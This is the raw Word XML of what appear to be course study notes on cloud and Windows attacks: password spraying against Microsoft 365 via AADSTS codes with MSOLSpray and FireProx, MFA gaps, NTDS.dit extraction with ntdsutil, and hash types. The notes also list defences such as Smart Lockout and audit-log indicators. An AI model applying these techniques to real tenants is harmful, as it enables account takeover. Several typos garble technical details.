            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Access to these password lists </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>are</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> controversial: stolen property.</w:t>
            </w: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135E4D36" w14:textId="6959F02C" w:rsidR="00475B12" w:rsidRPr="003548AD" w:rsidRDefault="00475B12">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003548AD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud SaaS logins are almost universally public </w:t>
            </w:r>
            <w:r w:rsidR="003548AD" w:rsidRPr="003548AD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>access,</w:t>
            </w:r>
            <w:r w:rsidRPr="003548AD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and this is an opportunity for an attacker.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BAC336C" w14:textId="44B04CD1" w:rsidR="00475B12" w:rsidRPr="003548AD" w:rsidRDefault="003548AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="65"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003548AD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Two important concepts to keep in mind: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07326B20" w14:textId="77777777" w:rsidR="003548AD" w:rsidRPr="003548AD" w:rsidRDefault="003548AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003548AD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attackers will use cloud services against your organization.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="219C4B19" w14:textId="4DA3E078" w:rsidR="003548AD" w:rsidRPr="003548AD" w:rsidRDefault="003548AD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="66"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003548AD">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attackers can be very crafty in how they implement attacks.</w:t>
            </w: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78055513" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00596070" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Login.microsoft.com is an API endpoint for authentication.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="007CCEEE" w14:textId="48198C56" w:rsidR="00596070" w:rsidRPr="006F5A04" w:rsidRDefault="00596070" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Used by many Microsoft 365 services, and it returns detail error status codes following logging attempts.</w:t>
            </w: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D50A91" w:rsidRPr="006F5A04" w14:paraId="6161A609" w14:textId="77777777" w:rsidTr="001D6D31">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C22DF54" w14:textId="7C6B774C" w:rsidR="00D50A91" w:rsidRPr="006F5A04" w:rsidRDefault="002D74EE" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AADSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30DE3EC2" w14:textId="11FEB189" w:rsidR="00D50A91" w:rsidRPr="006F5A04" w:rsidRDefault="002D74EE" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Azure active Directory Security Token Service. When the </w:t>
            </w:r>
            <w:r w:rsidR="001D6D31">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>user submits authentication credentials, the AADSTS services returns a detailed response that includes an AADSTS response code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="591A5684" w14:textId="4013561F" w:rsidR="00D50A91" w:rsidRPr="006F5A04" w:rsidRDefault="001D6D31" w:rsidP="001D6D31">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6275EF13" w14:textId="05553C4A" w:rsidR="00D50A91" w:rsidRPr="006F5A04" w:rsidRDefault="001D6D31"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MSOLSpray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EFD7371" w14:textId="78183C1A" w:rsidR="00D713AA" w:rsidRDefault="00153DA7" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Microsoft 365 gives attackers the insight they need to target vulnerable accounts. By leveraging the  AADSTS response codes to implement an informed password spray attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7D247A" w14:textId="139AA6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invoke-MSOLSpray</w:t>
            </w:r>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7E7FA3EA" w14:textId="33AD8384" w:rsidR="00303D06"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On-by-default for Microsoft 365 authentication.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27569488" w14:textId="77777777"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Account lockout following multiple login failures for one account.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739DB6D3" w14:textId="229B31AD"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Blocks IP address source following 10 unsuccessful login attempts (3 for Azure US.gov). Default lockout duration is 60 seconds, non-blocked Ips can still login to prevent DoS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1481B3D1" w14:textId="65CD0897"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Smart lockout helps lock out bad actors that try to guess your user’s passwords or use brute-force methods to get in.</w:t>
            </w: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AWS API Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D9942CB" w14:textId="6620D6B2" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00400AE5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Is a service from Amazon that allows organization to establish an API gateway server as the front-end to one or more HTTP servers, often in the form of micro services. It is a Kind of proxy server, that abstract one of more HTTP microservices with a single hostname.</w:t>
            </w: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FireProx and MSOLSpray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C32FD35" w14:textId="61778334" w:rsidR="00400AE5" w:rsidRDefault="00542702" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>FireProx is a python tool. Straightforward front-end to creating, listing, and deleting AWS API Gateway instances using AWS API credentials. It also integrates with MSOLSpray.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B9ACF3A" w14:textId="68E7B5B6" w:rsidR="00303D06" w:rsidRPr="00400AE5" w:rsidRDefault="00400AE5" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00303D06" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nvoke-MFASweep</w:t>
            </w:r>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77D44097" w14:textId="362071B3" w:rsidR="00303D06"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Microsoft 365 MFA security default policy applies to all tenant users.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EF00840" w14:textId="0B9E3DBE" w:rsidR="00FD5044"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Conditional Access policies complicate MFA use to suit business needs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="470FB0F1" w14:textId="59172BBA" w:rsidR="00FD5044"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Attackers will use valid credentials to fin non-MFA access opportunities.</w:t>
            </w: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F50664" w:rsidRPr="006F5A04" w14:paraId="0C1EBC4B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD7E43B" w14:textId="355057FD" w:rsidR="00F50664" w:rsidRPr="006F5A04" w:rsidRDefault="00FD5044" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Microsoft Conditional Access (CA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545B936F" w14:textId="2C9654C7" w:rsidR="00F50664" w:rsidRPr="006F5A04" w:rsidRDefault="00FD5044" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Allows an organization to choose the specific conditions when MFA is required, often creating exceptions. It can be used to augment the strong MFA security policies while meeting the needs of a business, but it can also be used to overly permit access to Microsoft 365 services without the additional burden of MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5833E7A8" w14:textId="1E3F15AF" w:rsidR="00F50664" w:rsidRPr="006F5A04" w:rsidRDefault="00FD5044" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A4B0C2B" w14:textId="40406E2A" w:rsidR="00F50664" w:rsidRPr="006F5A04" w:rsidRDefault="00FD5044" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00303D06" w:rsidRPr="006F5A04" w14:paraId="48B3D9C4" w14:textId="77777777" w:rsidTr="001F47FE">
        <w:trPr>
          <w:trHeight w:val="51"/>
        </w:trPr>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2E647FA7" w14:textId="0167C2A1" w:rsidR="00FD5044" w:rsidRPr="001F47FE" w:rsidRDefault="00FD5044">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 xml:space="preserve">Unified audit logging data to identify suspicious data access, </w:t>
            </w:r>
            <w:r w:rsidR="001F47FE" w:rsidRPr="001F47FE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>authentication</w:t>
            </w:r>
            <w:r w:rsidRPr="001F47FE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> patterns.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3137550D" w14:textId="74A82CD4" w:rsidR="00FD5044" w:rsidRPr="001F47FE" w:rsidRDefault="00FD5044">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 xml:space="preserve">Unauthorized account license </w:t>
            </w:r>
            <w:r w:rsidR="001F47FE" w:rsidRPr="001F47FE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>downgrades</w:t>
            </w:r>
            <w:r w:rsidRPr="001F47FE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (E5 to P1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CF66FA4" w14:textId="04A0296D" w:rsidR="00FD5044"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Changed MFA settings (CA to permit IP list)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F61F92B" w14:textId="037080BF" w:rsidR="001F47FE"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Disabled audit settings on mailboxes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD7E079" w14:textId="43CB4EFC" w:rsidR="001F47FE"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Mailbox permission changes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AF9905B" w14:textId="46D9D8F1" w:rsidR="00303D06" w:rsidRPr="001F47FE" w:rsidRDefault="00303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="69"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F47FE">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Account license downgrade:  Get-MsoUser</w:t>
            </w:r>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2EFD6365" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="001E6DEA" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Several options for password hashes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="771401F3" w14:textId="77777777"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Windows: LANMAN, NT.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F7B4CCF" w14:textId="77777777"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Linux/UNIX: DES, #DES, MD%, Blowfish, SHA 256, SHA512.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263D2E12" w14:textId="2FC53CC5"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CPU and memory intensive: PBKDF2, Scrypt, Yescrypt, Argon2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C15A07A" w14:textId="01A5D4C5"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Many custom protocols and older algorithms as well</w:t>
            </w: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3C5E914A" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00AF18DD" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Legacy password hashing mechanism. Still in use in older or upgraded windows systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620A5389" w14:textId="510BA7F3" w:rsidR="00AF18DD" w:rsidRPr="006F5A04" w:rsidRDefault="00AF18DD" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>brute force attack with accelerated hardware. Alpha numeric char:15 seconds. Alpha-numeric-all symbols: 10 minutes.</w:t>
            </w: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3A1C1796" w14:textId="7F6C368C" w:rsidR="00303D06" w:rsidRDefault="008632D8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Modern Windows systems use NT hashes because they preserve case sensitivity, convers to Unicode, then MD$ hashed. And encrypt using RC4 or AES-CBC-128 in SAM.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63D9BEF9" w14:textId="23834EA1" w:rsidR="008632D8" w:rsidRPr="006F5A04" w:rsidRDefault="008632D8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Not to be confused with NTLMv1 and NTLMv2 since it is an authentication protocol, not a hash function.</w:t>
            </w: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296523E8" w14:textId="77777777" w:rsidR="00303D06"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Adding a salt to the password adds randomness to the password hashes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1989C1F9" w14:textId="77777777" w:rsidR="008632D8"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The salt is a randomly selected string, but it is not a secret.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CB1B35D" w14:textId="6CE888E7" w:rsidR="008632D8"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The user isn’t concerned with the salt; the OS adds it automatically when calculating the password hash.</w:t>
            </w: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119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D64ACB" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="008E2EE0" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Obtain NTDS.dit and SYSTEM registry hive data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C7C248" w14:textId="7B659A50" w:rsidR="008E2EE0" w:rsidRPr="006F5A04" w:rsidRDefault="008E2EE0" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Built-in ntdsutil.exe allows an attacker to backup AD.</w:t>
            </w:r>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B622F8" w:rsidRPr="006F5A04" w14:paraId="0BC6F32E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="168264F7" w14:textId="7424A4F6" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="00B622F8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ntdutil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236819D2" w14:textId="0CC1E59E" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="00B622F8" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Is used for backing up the active directory information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB348B4" w14:textId="0592A177" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="00B622F8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F9232A" w14:textId="345D8353" w:rsidR="00B622F8" w:rsidRPr="006F5A04" w:rsidRDefault="00B622F8" w:rsidP="00303D06">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
